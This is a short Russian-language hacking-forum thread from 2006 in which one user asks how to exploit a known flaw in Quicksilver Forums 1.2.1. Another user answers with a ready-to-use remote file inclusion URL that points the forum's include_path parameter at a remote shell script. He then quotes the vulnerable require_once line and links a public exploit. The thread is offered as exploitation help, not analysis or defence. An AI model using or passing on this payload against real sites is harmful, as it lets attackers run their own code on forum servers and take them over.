Форумы Quicksilver Forums 1.2.1

Discussion in 'Уязвимости CMS/форумов' started by CaH9, 17 Dec 2006.

  1. CaH9

    CaH9 Elder - Старейшина

    Joined:
    16 Apr 2006
    Messages:
    34
    Likes Received:
    10
    Reputations:
    0
    http://www.securitylab.ru/vulnerability/273870.php
    люди помогите разобраться с уязвимостью , как ее использовать ?
    P.S в поиске пусто
     
    #1 CaH9, 17 Dec 2006
  2. kyzmi4

    kyzmi4 Elder - Старейшина

    Joined:
    19 Jul 2004
    Messages:
    113
    Likes Received:
    35
    Reputations:
    5
    О.o очень просто. Береш уязвимый форум и подставляеш в адресной строке:
    lib/activeutil.php?set[include_path]="сайт с шеллом например rst"

    Пример:
    например есть сайт с форумом http://localhost
    Там есть форум http://localhost/forum/
    Пишем: http://localhost/forum/lib/activeutil.php?set[include_path]=http://site.com/evilscript.txt?
     
    #2 kyzmi4, 17 Dec 2006
    2 people like this.
  3. CaH9

    CaH9 Elder - Старейшина

    Joined:
    16 Apr 2006
    Messages:
    34
    Likes Received:
    10
    Reputations:
    0
    а что означает [include_path] ???
     
    #3 CaH9, 17 Dec 2006
  4. kyzmi4

    kyzmi4 Elder - Старейшина

    Joined:
    19 Jul 2004
    Messages:
    113
    Likes Received:
    35
    Reputations:
    5
    http://www.milw0rm.com/exploits/2356

    require_once $set['include_path'] . '/lib/bbcode.php';

    Кароче [include_path] так и оставляй =)
     
    #4 kyzmi4, 17 Dec 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.